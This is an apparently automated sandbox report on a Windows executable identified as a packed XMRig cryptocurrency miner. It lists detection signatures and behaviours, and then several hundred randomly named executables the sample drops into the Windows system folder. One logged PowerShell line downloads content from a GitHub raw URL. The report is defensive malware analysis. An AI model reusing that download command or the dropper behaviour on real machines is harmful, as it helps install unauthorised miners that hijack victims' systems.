Malware Analysis Report

2024-11-16 10:59

Sample ID 240614-hlvz5asfrq
Target aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe
SHA256 3c0d28b81a10612638ae1eb1c39fbfa645982775c5653681c342a155a95d8bce
Tags
upx miner xmrig execution
score
10/10

Analysis Overview

Threat Level: Known bad

The file aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 06:49

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 06:49

Reported

2024-06-14 06:52

Platform

win7-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL


UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\blTqtUH.exe

C:\Windows\System\blTqtUH.exe

C:\Windows\System\BVUxEct.exe

C:\Windows\System\BVUxEct.exe

C:\Windows\System\PgOetud.exe

C:\Windows\System\PgOetud.exe

C:\Windows\System\YKgWHYX.exe

C:\Windows\System\YKgWHYX.exe

C:\Windows\System\WYxMrhv.exe

C:\Windows\System\WYxMrhv.exe

C:\Windows\System\TizSLFU.exe

C:\Windows\System\TizSLFU.exe

C:\Windows\System\pxnJtCg.exe

C:\Windows\System\pxnJtCg.exe

C:\Windows\System\NChKRKs.exe

C:\Windows\System\NChKRKs.exe

C:\Windows\System\AMXTKmC.exe

C:\Windows\System\AMXTKmC.exe

C:\Windows\System\YVBYTTJ.exe

C:\Windows\System\YVBYTTJ.exe

C:\Windows\System\snQQFOC.exe

C:\Windows\System\snQQFOC.exe

C:\Windows\System\SLoByxK.exe

C:\Windows\System\SLoByxK.exe

C:\Windows\System\nmWWNlF.exe

C:\Windows\System\nmWWNlF.exe

C:\Windows\System\NpgjExS.exe

C:\Windows\System\NpgjExS.exe

C:\Windows\System\zZmrtxU.exe

C:\Windows\System\zZmrtxU.exe

C:\Windows\System\vaiSBIY.exe

C:\Windows\System\vaiSBIY.exe

C:\Windows\System\vZKyuwS.exe

C:\Windows\System\vZKyuwS.exe

C:\Windows\System\czGedRw.exe

C:\Windows\System\czGedRw.exe

C:\Windows\System\niudbtf.exe

C:\Windows\System\niudbtf.exe

C:\Windows\System\NAxqhFt.exe

C:\Windows\System\NAxqhFt.exe

C:\Windows\System\lncnuNa.exe

C:\Windows\System\lncnuNa.exe

C:\Windows\System\EgmXNJl.exe

C:\Windows\System\EgmXNJl.exe

C:\Windows\System\WYGbnUA.exe

C:\Windows\System\WYGbnUA.exe

C:\Windows\System\EdeXjwe.exe

C:\Windows\System\EdeXjwe.exe

C:\Windows\System\jDFqIQI.exe

C:\Windows\System\jDFqIQI.exe

C:\Windows\System\fpsccKE.exe

C:\Windows\System\fpsccKE.exe

C:\Windows\System\NQoGkix.exe

C:\Windows\System\NQoGkix.exe

C:\Windows\System\vFyGNuz.exe

C:\Windows\System\vFyGNuz.exe

C:\Windows\System\gEOXTSU.exe

C:\Windows\System\gEOXTSU.exe

C:\Windows\System\GIDvWCA.exe

C:\Windows\System\GIDvWCA.exe

C:\Windows\System\PoZPtIK.exe

C:\Windows\System\PoZPtIK.exe

C:\Windows\System\ooaMItD.exe

C:\Windows\System\ooaMItD.exe

C:\Windows\System\WLuzxiI.exe

C:\Windows\System\WLuzxiI.exe

C:\Windows\System\mgAdvAy.exe

C:\Windows\System\mgAdvAy.exe

C:\Windows\System\bfOnGnV.exe

C:\Windows\System\bfOnGnV.exe

C:\Windows\System\ePcixeJ.exe

C:\Windows\System\ePcixeJ.exe

C:\Windows\System\vjFDkyg.exe

C:\Windows\System\vjFDkyg.exe

C:\Windows\System\ngkUXRI.exe

C:\Windows\System\ngkUXRI.exe

C:\Windows\System\eUhoBGt.exe

C:\Windows\System\eUhoBGt.exe

C:\Windows\System\ivkHoDZ.exe

C:\Windows\System\ivkHoDZ.exe

C:\Windows\System\luIrrSa.exe

C:\Windows\System\luIrrSa.exe

C:\Windows\System\sMINWQX.exe

C:\Windows\System\sMINWQX.exe

C:\Windows\System\WjBWCTx.exe

C:\Windows\System\WjBWCTx.exe

C:\Windows\System\AeRIUiA.exe

C:\Windows\System\AeRIUiA.exe

C:\Windows\System\bbGyXBE.exe

C:\Windows\System\bbGyXBE.exe

C:\Windows\System\MwyhBVF.exe

C:\Windows\System\MwyhBVF.exe

C:\Windows\System\poFseLz.exe

C:\Windows\System\poFseLz.exe

C:\Windows\System\ovbEjoj.exe

C:\Windows\System\ovbEjoj.exe

C:\Windows\System\tnlHRIo.exe

C:\Windows\System\tnlHRIo.exe

C:\Windows\System\ImKrXsj.exe

C:\Windows\System\ImKrXsj.exe

C:\Windows\System\KgmvcGH.exe

C:\Windows\System\KgmvcGH.exe

C:\Windows\System\ObFnUvc.exe

C:\Windows\System\ObFnUvc.exe

C:\Windows\System\KnjyHiG.exe

C:\Windows\System\KnjyHiG.exe

C:\Windows\System\cLXMILp.exe

C:\Windows\System\cLXMILp.exe

C:\Windows\System\OLZOhPq.exe

C:\Windows\System\OLZOhPq.exe

C:\Windows\System\rIimAVe.exe

C:\Windows\System\rIimAVe.exe

C:\Windows\System\BFpYeHY.exe

C:\Windows\System\BFpYeHY.exe

C:\Windows\System\dlSToit.exe

C:\Windows\System\dlSToit.exe

C:\Windows\System\xPHhiMi.exe

C:\Windows\System\xPHhiMi.exe

C:\Windows\System\YEXGkZb.exe

C:\Windows\System\YEXGkZb.exe

C:\Windows\System\sWlxwoj.exe

C:\Windows\System\sWlxwoj.exe

C:\Windows\System\dRgVqTH.exe

C:\Windows\System\dRgVqTH.exe

C:\Windows\System\jRsmveh.exe

C:\Windows\System\jRsmveh.exe

C:\Windows\System\dZHENuz.exe

C:\Windows\System\dZHENuz.exe

C:\Windows\System\jCtamKz.exe

C:\Windows\System\jCtamKz.exe

C:\Windows\System\xgsrfZD.exe

C:\Windows\System\xgsrfZD.exe

C:\Windows\System\GTluGxN.exe

C:\Windows\System\GTluGxN.exe

C:\Windows\System\mgNzyMN.exe

C:\Windows\System\mgNzyMN.exe

C:\Windows\System\BqgQFMk.exe

C:\Windows\System\BqgQFMk.exe

C:\Windows\System\tarvZug.exe

C:\Windows\System\tarvZug.exe

C:\Windows\System\vtXHQSw.exe

C:\Windows\System\vtXHQSw.exe

C:\Windows\System\jWdEbNx.exe

C:\Windows\System\jWdEbNx.exe

C:\Windows\System\ISvbNZG.exe

C:\Windows\System\ISvbNZG.exe

C:\Windows\System\bgrrpNS.exe

C:\Windows\System\bgrrpNS.exe

C:\Windows\System\GXwBhUU.exe

C:\Windows\System\GXwBhUU.exe

C:\Windows\System\JbCSDBq.exe

C:\Windows\System\JbCSDBq.exe

C:\Windows\System\Vapdtqg.exe

C:\Windows\System\Vapdtqg.exe

C:\Windows\System\FqkqLRK.exe

C:\Windows\System\FqkqLRK.exe

C:\Windows\System\yGCQwwq.exe

C:\Windows\System\yGCQwwq.exe

C:\Windows\System\WAMasvM.exe

C:\Windows\System\WAMasvM.exe

C:\Windows\System\PrqJBda.exe

C:\Windows\System\PrqJBda.exe

C:\Windows\System\JCVhImY.exe

C:\Windows\System\JCVhImY.exe

C:\Windows\System\MoCFNzK.exe

C:\Windows\System\MoCFNzK.exe

C:\Windows\System\VHOAdDC.exe

C:\Windows\System\VHOAdDC.exe

C:\Windows\System\ZafBYup.exe

C:\Windows\System\ZafBYup.exe

C:\Windows\System\IHrYPwn.exe

C:\Windows\System\IHrYPwn.exe

C:\Windows\System\PaQsAnc.exe

C:\Windows\System\PaQsAnc.exe

C:\Windows\System\MnTpGCC.exe

C:\Windows\System\MnTpGCC.exe

C:\Windows\System\jsQHjyh.exe

C:\Windows\System\jsQHjyh.exe

C:\Windows\System\WmVolAe.exe

C:\Windows\System\WmVolAe.exe

C:\Windows\System\lTkbITJ.exe

C:\Windows\System\lTkbITJ.exe

C:\Windows\System\WTKCjFf.exe

C:\Windows\System\WTKCjFf.exe

C:\Windows\System\PfKdHSC.exe

C:\Windows\System\PfKdHSC.exe

C:\Windows\System\vTqNlQz.exe

C:\Windows\System\vTqNlQz.exe

C:\Windows\System\ECCLRxW.exe

C:\Windows\System\ECCLRxW.exe

C:\Windows\System\RKFOokG.exe

C:\Windows\System\RKFOokG.exe

C:\Windows\System\PWVPfEi.exe

C:\Windows\System\PWVPfEi.exe

C:\Windows\System\zVNvcET.exe

C:\Windows\System\zVNvcET.exe

C:\Windows\System\IPOLnYq.exe

C:\Windows\System\IPOLnYq.exe

C:\Windows\System\bFoBQDG.exe

C:\Windows\System\bFoBQDG.exe

C:\Windows\System\GJpKLAO.exe

C:\Windows\System\GJpKLAO.exe

C:\Windows\System\GPfrkSk.exe

C:\Windows\System\GPfrkSk.exe

C:\Windows\System\siuCGxY.exe

C:\Windows\System\siuCGxY.exe

C:\Windows\System\BzmPSFV.exe

C:\Windows\System\BzmPSFV.exe

C:\Windows\System\ndcKuWi.exe

C:\Windows\System\ndcKuWi.exe

C:\Windows\System\SbCXTvA.exe

C:\Windows\System\SbCXTvA.exe

C:\Windows\System\xrfJBVq.exe

C:\Windows\System\xrfJBVq.exe

C:\Windows\System\hgQODZa.exe

C:\Windows\System\hgQODZa.exe

C:\Windows\System\TqISKFW.exe

C:\Windows\System\TqISKFW.exe

C:\Windows\System\UjWsJwO.exe

C:\Windows\System\UjWsJwO.exe

C:\Windows\System\eGgEMwx.exe

C:\Windows\System\eGgEMwx.exe

C:\Windows\System\yzRhGhP.exe

C:\Windows\System\yzRhGhP.exe

C:\Windows\System\FHOzpZa.exe

C:\Windows\System\FHOzpZa.exe

C:\Windows\System\acXHzUC.exe

C:\Windows\System\acXHzUC.exe

C:\Windows\System\rAnnDTU.exe

C:\Windows\System\rAnnDTU.exe

C:\Windows\System\MBVhMdY.exe

C:\Windows\System\MBVhMdY.exe

C:\Windows\System\FEykpKG.exe

C:\Windows\System\FEykpKG.exe

C:\Windows\System\pppHtfD.exe

C:\Windows\System\pppHtfD.exe

C:\Windows\System\DfgEINp.exe

C:\Windows\System\DfgEINp.exe

C:\Windows\System\kKARezI.exe

C:\Windows\System\kKARezI.exe

C:\Windows\System\fHjrUyt.exe

C:\Windows\System\fHjrUyt.exe

C:\Windows\System\WWaSblH.exe

C:\Windows\System\WWaSblH.exe

C:\Windows\System\icJktBC.exe

C:\Windows\System\icJktBC.exe

C:\Windows\System\EsrXZcB.exe

C:\Windows\System\EsrXZcB.exe

C:\Windows\System\hADmoIn.exe

C:\Windows\System\hADmoIn.exe

C:\Windows\System\huzmKfm.exe

C:\Windows\System\huzmKfm.exe

C:\Windows\System\LPvNjsS.exe

C:\Windows\System\LPvNjsS.exe

C:\Windows\System\WEOBZvD.exe

C:\Windows\System\WEOBZvD.exe

C:\Windows\System\JHRDGfr.exe

C:\Windows\System\JHRDGfr.exe

C:\Windows\System\KPvOqVh.exe

C:\Windows\System\KPvOqVh.exe

C:\Windows\System\joBNgsD.exe

C:\Windows\System\joBNgsD.exe

C:\Windows\System\hePJFCu.exe

C:\Windows\System\hePJFCu.exe

C:\Windows\System\aqMqAYY.exe

C:\Windows\System\aqMqAYY.exe

C:\Windows\System\fogzsWa.exe

C:\Windows\System\fogzsWa.exe

C:\Windows\System\WlBWvUI.exe

C:\Windows\System\WlBWvUI.exe

C:\Windows\System\lZeprAo.exe

C:\Windows\System\lZeprAo.exe

C:\Windows\System\lduoQOC.exe

C:\Windows\System\lduoQOC.exe

C:\Windows\System\WOgNFaQ.exe

C:\Windows\System\WOgNFaQ.exe

C:\Windows\System\fuASuWI.exe

C:\Windows\System\fuASuWI.exe

C:\Windows\System\aXqtjki.exe

C:\Windows\System\aXqtjki.exe

C:\Windows\System\GEJTbnh.exe

C:\Windows\System\GEJTbnh.exe

C:\Windows\System\tqEVsqh.exe

C:\Windows\System\tqEVsqh.exe

C:\Windows\System\ibkzPGg.exe

C:\Windows\System\ibkzPGg.exe

C:\Windows\System\ElurgSC.exe

C:\Windows\System\ElurgSC.exe

C:\Windows\System\XzMlTdn.exe

C:\Windows\System\XzMlTdn.exe

C:\Windows\System\PlPKuaI.exe

C:\Windows\System\PlPKuaI.exe

C:\Windows\System\kRzpBbU.exe

C:\Windows\System\kRzpBbU.exe

C:\Windows\System\GCGhZLz.exe

C:\Windows\System\GCGhZLz.exe

C:\Windows\System\MMZCSMa.exe

C:\Windows\System\MMZCSMa.exe

C:\Windows\System\XQvwfIc.exe

C:\Windows\System\XQvwfIc.exe

C:\Windows\System\uJcyUYo.exe

C:\Windows\System\uJcyUYo.exe

C:\Windows\System\HVjmKYj.exe

C:\Windows\System\HVjmKYj.exe

C:\Windows\System\NaNhgza.exe

C:\Windows\System\NaNhgza.exe

C:\Windows\System\ecsuMZp.exe

C:\Windows\System\ecsuMZp.exe

C:\Windows\System\cwgsZdY.exe

C:\Windows\System\cwgsZdY.exe

C:\Windows\System\WxTRtib.exe

C:\Windows\System\WxTRtib.exe

C:\Windows\System\asZfpeJ.exe

C:\Windows\System\asZfpeJ.exe

C:\Windows\System\DVpWhzb.exe

C:\Windows\System\DVpWhzb.exe

C:\Windows\System\mdEQVAP.exe

C:\Windows\System\mdEQVAP.exe

C:\Windows\System\arhPhQw.exe

C:\Windows\System\arhPhQw.exe

C:\Windows\System\Jhixlks.exe

C:\Windows\System\Jhixlks.exe

C:\Windows\System\MPFMMPj.exe

C:\Windows\System\MPFMMPj.exe

C:\Windows\System\JeJxKRh.exe

C:\Windows\System\JeJxKRh.exe

C:\Windows\System\IXOuSiQ.exe

C:\Windows\System\IXOuSiQ.exe

C:\Windows\System\zzFRvyW.exe

C:\Windows\System\zzFRvyW.exe

C:\Windows\System\ttaJqXV.exe

C:\Windows\System\ttaJqXV.exe

C:\Windows\System\gkmaGHC.exe

C:\Windows\System\gkmaGHC.exe

C:\Windows\System\MhcLUhb.exe

C:\Windows\System\MhcLUhb.exe

C:\Windows\System\KcNWsta.exe

C:\Windows\System\KcNWsta.exe

C:\Windows\System\EmJzzKy.exe

C:\Windows\System\EmJzzKy.exe

C:\Windows\System\QYOfUvC.exe

C:\Windows\System\QYOfUvC.exe

C:\Windows\System\WfxKAgU.exe

C:\Windows\System\WfxKAgU.exe

C:\Windows\System\FoaOKye.exe

C:\Windows\System\FoaOKye.exe

C:\Windows\System\vcOSGfm.exe

C:\Windows\System\vcOSGfm.exe

C:\Windows\System\VcVyXvm.exe

C:\Windows\System\VcVyXvm.exe

C:\Windows\System\gxLNebO.exe

C:\Windows\System\gxLNebO.exe

C:\Windows\System\mxcAsok.exe

C:\Windows\System\mxcAsok.exe

C:\Windows\System\FGCtHos.exe

C:\Windows\System\FGCtHos.exe

C:\Windows\System\fiHznlb.exe

C:\Windows\System\fiHznlb.exe

C:\Windows\System\EtMAPKZ.exe

C:\Windows\System\EtMAPKZ.exe

C:\Windows\System\TztVQik.exe

C:\Windows\System\TztVQik.exe

C:\Windows\System\yNsFPPX.exe

C:\Windows\System\yNsFPPX.exe

C:\Windows\System\iAMvKdL.exe

C:\Windows\System\iAMvKdL.exe

C:\Windows\System\ZvvJsRh.exe

C:\Windows\System\ZvvJsRh.exe

C:\Windows\System\vZHUVxu.exe

C:\Windows\System\vZHUVxu.exe

C:\Windows\System\JkUCmDW.exe

C:\Windows\System\JkUCmDW.exe

C:\Windows\System\WpXuZvg.exe

C:\Windows\System\WpXuZvg.exe

C:\Windows\System\txOissT.exe

C:\Windows\System\txOissT.exe

C:\Windows\System\aQNhMwa.exe

C:\Windows\System\aQNhMwa.exe

C:\Windows\System\tlWsSMo.exe

C:\Windows\System\tlWsSMo.exe

C:\Windows\System\HLVheJT.exe

C:\Windows\System\HLVheJT.exe

C:\Windows\System\uqteDVR.exe

C:\Windows\System\uqteDVR.exe

C:\Windows\System\AtTZdzM.exe

C:\Windows\System\AtTZdzM.exe

C:\Windows\System\JPfrrnI.exe

C:\Windows\System\JPfrrnI.exe

C:\Windows\System\wwcYLgM.exe

C:\Windows\System\wwcYLgM.exe

C:\Windows\System\ZQIAbHc.exe

C:\Windows\System\ZQIAbHc.exe

C:\Windows\System\XoXFslN.exe

C:\Windows\System\XoXFslN.exe

C:\Windows\System\vZZrRsj.exe

C:\Windows\System\vZZrRsj.exe

C:\Windows\System\GDZSIxJ.exe

C:\Windows\System\GDZSIxJ.exe

C:\Windows\System\tWafgYF.exe

C:\Windows\System\tWafgYF.exe

C:\Windows\System\XVvEaau.exe

C:\Windows\System\XVvEaau.exe

C:\Windows\System\AiOoVeN.exe

C:\Windows\System\AiOoVeN.exe

C:\Windows\System\jXgSote.exe

C:\Windows\System\jXgSote.exe

C:\Windows\System\ccoauZy.exe

C:\Windows\System\ccoauZy.exe

C:\Windows\System\mVxMBgE.exe

C:\Windows\System\mVxMBgE.exe

C:\Windows\System\DNIrNTS.exe

C:\Windows\System\DNIrNTS.exe

C:\Windows\System\DSYAYTR.exe

C:\Windows\System\DSYAYTR.exe

C:\Windows\System\xQwTQqS.exe

C:\Windows\System\xQwTQqS.exe

C:\Windows\System\JHPHobz.exe

C:\Windows\System\JHPHobz.exe

C:\Windows\System\HZPgHhB.exe

C:\Windows\System\HZPgHhB.exe

C:\Windows\System\LFERhig.exe

C:\Windows\System\LFERhig.exe

C:\Windows\System\dGLvoFw.exe

C:\Windows\System\dGLvoFw.exe

C:\Windows\System\hokIynJ.exe

C:\Windows\System\hokIynJ.exe

C:\Windows\System\aIsofwP.exe

C:\Windows\System\aIsofwP.exe

C:\Windows\System\JANCUHR.exe

C:\Windows\System\JANCUHR.exe

C:\Windows\System\ppToXzG.exe

C:\Windows\System\ppToXzG.exe

C:\Windows\System\bdEoxnD.exe

C:\Windows\System\bdEoxnD.exe

C:\Windows\System\DHNxWov.exe

C:\Windows\System\DHNxWov.exe

C:\Windows\System\CXhEwbV.exe

C:\Windows\System\CXhEwbV.exe

C:\Windows\System\LkPgyGA.exe

C:\Windows\System\LkPgyGA.exe

C:\Windows\System\UgFooba.exe

C:\Windows\System\UgFooba.exe

C:\Windows\System\rFYTmOJ.exe

C:\Windows\System\rFYTmOJ.exe

C:\Windows\System\qNxPzbU.exe

C:\Windows\System\qNxPzbU.exe

C:\Windows\System\aSEAHsX.exe

C:\Windows\System\aSEAHsX.exe

C:\Windows\System\sBdgijT.exe

C:\Windows\System\sBdgijT.exe

C:\Windows\System\bheVLUr.exe

C:\Windows\System\bheVLUr.exe

C:\Windows\System\dzRMWbK.exe

C:\Windows\System\dzRMWbK.exe

C:\Windows\System\XuGUYpa.exe

C:\Windows\System\XuGUYpa.exe

C:\Windows\System\QaQLMpR.exe

C:\Windows\System\QaQLMpR.exe

C:\Windows\System\TBVnRRk.exe

C:\Windows\System\TBVnRRk.exe

C:\Windows\System\BgDHJLR.exe

C:\Windows\System\BgDHJLR.exe

C:\Windows\System\ydDKTBD.exe

C:\Windows\System\ydDKTBD.exe

C:\Windows\System\bAdgaKO.exe

C:\Windows\System\bAdgaKO.exe

C:\Windows\System\slfJOHj.exe

C:\Windows\System\slfJOHj.exe

C:\Windows\System\BRYaRPH.exe

C:\Windows\System\BRYaRPH.exe

C:\Windows\System\kesvVAf.exe

C:\Windows\System\kesvVAf.exe

C:\Windows\System\vUUKrAM.exe

C:\Windows\System\vUUKrAM.exe

C:\Windows\System\NsiMlOM.exe

C:\Windows\System\NsiMlOM.exe

C:\Windows\System\lGxxMNA.exe

C:\Windows\System\lGxxMNA.exe

C:\Windows\System\AmxQnlf.exe

C:\Windows\System\AmxQnlf.exe

C:\Windows\System\ZTtzDGr.exe

C:\Windows\System\ZTtzDGr.exe

C:\Windows\System\xojwaev.exe

C:\Windows\System\xojwaev.exe

C:\Windows\System\inonsTL.exe

C:\Windows\System\inonsTL.exe

C:\Windows\System\dRAViae.exe

C:\Windows\System\dRAViae.exe

C:\Windows\System\xoPGsTU.exe

C:\Windows\System\xoPGsTU.exe

C:\Windows\System\KBbXrcx.exe

C:\Windows\System\KBbXrcx.exe

C:\Windows\System\epDkzge.exe

C:\Windows\System\epDkzge.exe

C:\Windows\System\sOlTsJU.exe

C:\Windows\System\sOlTsJU.exe

C:\Windows\System\wgFCJFH.exe

C:\Windows\System\wgFCJFH.exe

C:\Windows\System\pbsQsLZ.exe

C:\Windows\System\pbsQsLZ.exe

C:\Windows\System\OwexauY.exe

C:\Windows\System\OwexauY.exe

C:\Windows\System\amWrmwx.exe

C:\Windows\System\amWrmwx.exe

C:\Windows\System\trDJKRa.exe

C:\Windows\System\trDJKRa.exe

C:\Windows\System\syZZQif.exe

C:\Windows\System\syZZQif.exe

C:\Windows\System\pDpvwpE.exe

C:\Windows\System\pDpvwpE.exe

C:\Windows\System\xCUDRUa.exe

C:\Windows\System\xCUDRUa.exe

C:\Windows\System\bnwuItg.exe

C:\Windows\System\bnwuItg.exe

C:\Windows\System\gQCqwLu.exe

C:\Windows\System\gQCqwLu.exe

C:\Windows\System\neESLwe.exe

C:\Windows\System\neESLwe.exe

C:\Windows\System\izDhgXm.exe

C:\Windows\System\izDhgXm.exe

C:\Windows\System\LRbvxWB.exe

C:\Windows\System\LRbvxWB.exe

C:\Windows\System\TNGjyGp.exe

C:\Windows\System\TNGjyGp.exe

C:\Windows\System\rYTRtBq.exe

C:\Windows\System\rYTRtBq.exe

C:\Windows\System\cGzXyUM.exe

C:\Windows\System\cGzXyUM.exe

C:\Windows\System\iNVYbsm.exe

C:\Windows\System\iNVYbsm.exe

C:\Windows\System\aZDQQQD.exe

C:\Windows\System\aZDQQQD.exe

C:\Windows\System\WOhSbZL.exe

C:\Windows\System\WOhSbZL.exe

C:\Windows\System\jVYQIRi.exe

C:\Windows\System\jVYQIRi.exe

C:\Windows\System\VRRWZOV.exe

C:\Windows\System\VRRWZOV.exe

C:\Windows\System\FvBJYVx.exe

C:\Windows\System\FvBJYVx.exe

C:\Windows\System\pdrqpOb.exe

C:\Windows\System\pdrqpOb.exe

C:\Windows\System\dOmqqTs.exe

C:\Windows\System\dOmqqTs.exe

C:\Windows\System\ETpfYYQ.exe

C:\Windows\System\ETpfYYQ.exe

C:\Windows\System\PKFUcOt.exe

C:\Windows\System\PKFUcOt.exe

C:\Windows\System\ezgYbHq.exe

C:\Windows\System\ezgYbHq.exe

C:\Windows\System\gmLitGZ.exe

C:\Windows\System\gmLitGZ.exe

C:\Windows\System\GXbRmPC.exe

C:\Windows\System\GXbRmPC.exe

C:\Windows\System\nfNUFqg.exe

C:\Windows\System\nfNUFqg.exe

C:\Windows\System\GMNwCaK.exe

C:\Windows\System\GMNwCaK.exe

C:\Windows\System\LLEMiDc.exe

C:\Windows\System\LLEMiDc.exe

C:\Windows\System\SEyipZV.exe

C:\Windows\System\SEyipZV.exe

C:\Windows\System\uOkOcGK.exe

C:\Windows\System\uOkOcGK.exe

C:\Windows\System\nWBwjKc.exe

C:\Windows\System\nWBwjKc.exe

C:\Windows\System\ecUOJVc.exe

C:\Windows\System\ecUOJVc.exe

C:\Windows\System\lCaKAsW.exe

C:\Windows\System\lCaKAsW.exe

C:\Windows\System\tcbkIiK.exe

C:\Windows\System\tcbkIiK.exe

C:\Windows\System\uBYIhbJ.exe

C:\Windows\System\uBYIhbJ.exe

C:\Windows\System\dMjYKhZ.exe

C:\Windows\System\dMjYKhZ.exe

C:\Windows\System\hqDqmJt.exe

C:\Windows\System\hqDqmJt.exe

C:\Windows\System\LIOBlYE.exe

C:\Windows\System\LIOBlYE.exe

C:\Windows\System\ZHZqXCS.exe

C:\Windows\System\ZHZqXCS.exe

C:\Windows\System\uRcIEdY.exe

C:\Windows\System\uRcIEdY.exe

C:\Windows\System\rtYJhZN.exe

C:\Windows\System\rtYJhZN.exe

C:\Windows\System\gpkUxfm.exe

C:\Windows\System\gpkUxfm.exe

C:\Windows\System\OAKGLyA.exe

C:\Windows\System\OAKGLyA.exe

C:\Windows\System\HxWMIGi.exe

C:\Windows\System\HxWMIGi.exe

C:\Windows\System\lMjoGpS.exe

C:\Windows\System\lMjoGpS.exe

C:\Windows\System\ZSPhZuJ.exe

C:\Windows\System\ZSPhZuJ.exe

C:\Windows\System\CkfkzbW.exe

C:\Windows\System\CkfkzbW.exe

C:\Windows\System\cKhCkkJ.exe

C:\Windows\System\cKhCkkJ.exe

C:\Windows\System\onexGjI.exe

C:\Windows\System\onexGjI.exe

C:\Windows\System\SXXmcWU.exe

C:\Windows\System\SXXmcWU.exe

C:\Windows\System\dSqagdC.exe

C:\Windows\System\dSqagdC.exe

C:\Windows\System\QtcYiYb.exe

C:\Windows\System\QtcYiYb.exe

C:\Windows\System\UaIohmB.exe

C:\Windows\System\UaIohmB.exe

C:\Windows\System\eTKJkCV.exe

C:\Windows\System\eTKJkCV.exe

C:\Windows\System\smdWCSG.exe

C:\Windows\System\smdWCSG.exe

C:\Windows\System\vNbHzFf.exe

C:\Windows\System\vNbHzFf.exe

C:\Windows\System\VkSrldO.exe

C:\Windows\System\VkSrldO.exe

C:\Windows\System\xieQXpp.exe

C:\Windows\System\xieQXpp.exe

C:\Windows\System\PwgHCBt.exe

C:\Windows\System\PwgHCBt.exe

C:\Windows\System\jEoKlZc.exe

C:\Windows\System\jEoKlZc.exe

C:\Windows\System\CkOiolU.exe

C:\Windows\System\CkOiolU.exe

C:\Windows\System\ifSgRnI.exe

C:\Windows\System\ifSgRnI.exe

C:\Windows\System\kVEKwpu.exe

C:\Windows\System\kVEKwpu.exe

C:\Windows\System\RABhcGY.exe

C:\Windows\System\RABhcGY.exe

C:\Windows\System\kFZAYDh.exe

C:\Windows\System\kFZAYDh.exe

C:\Windows\System\SDQduMR.exe

C:\Windows\System\SDQduMR.exe

C:\Windows\System\wTfapvd.exe

C:\Windows\System\wTfapvd.exe

C:\Windows\System\EBMzVfd.exe

C:\Windows\System\EBMzVfd.exe

C:\Windows\System\ciaEBCZ.exe

C:\Windows\System\ciaEBCZ.exe

C:\Windows\System\AVuyrrJ.exe

C:\Windows\System\AVuyrrJ.exe

C:\Windows\System\OYIQRdC.exe

C:\Windows\System\OYIQRdC.exe

C:\Windows\System\QHFsExQ.exe

C:\Windows\System\QHFsExQ.exe

C:\Windows\System\zZDUMAm.exe

C:\Windows\System\zZDUMAm.exe

C:\Windows\System\NEXWVQy.exe

C:\Windows\System\NEXWVQy.exe

C:\Windows\System\CPMslHn.exe

C:\Windows\System\CPMslHn.exe

C:\Windows\System\ztLUxtx.exe

C:\Windows\System\ztLUxtx.exe

C:\Windows\System\uKunzBz.exe

C:\Windows\System\uKunzBz.exe

C:\Windows\System\xmSypld.exe

C:\Windows\System\xmSypld.exe

C:\Windows\System\VBpuTJF.exe

C:\Windows\System\VBpuTJF.exe

C:\Windows\System\bTezlsT.exe

C:\Windows\System\bTezlsT.exe

C:\Windows\System\XHabqZI.exe

C:\Windows\System\XHabqZI.exe

C:\Windows\System\GfFqMnu.exe

C:\Windows\System\GfFqMnu.exe

C:\Windows\System\dxDSZIN.exe

C:\Windows\System\dxDSZIN.exe

C:\Windows\System\BLZtZxs.exe

C:\Windows\System\BLZtZxs.exe

C:\Windows\System\UwhBEUU.exe

C:\Windows\System\UwhBEUU.exe

C:\Windows\System\prKuLGS.exe

C:\Windows\System\prKuLGS.exe

C:\Windows\System\jsJTuoG.exe

C:\Windows\System\jsJTuoG.exe

C:\Windows\System\BDkbmeW.exe

C:\Windows\System\BDkbmeW.exe

C:\Windows\System\GMCNAHV.exe

C:\Windows\System\GMCNAHV.exe

C:\Windows\System\rombsTj.exe

C:\Windows\System\rombsTj.exe

C:\Windows\System\jYzbADj.exe

C:\Windows\System\jYzbADj.exe

C:\Windows\System\nZpNlvE.exe

C:\Windows\System\nZpNlvE.exe

C:\Windows\System\bQZcsxO.exe

C:\Windows\System\bQZcsxO.exe

C:\Windows\System\xClpZuR.exe

C:\Windows\System\xClpZuR.exe

C:\Windows\System\bveYcih.exe

C:\Windows\System\bveYcih.exe

C:\Windows\System\REQJViV.exe

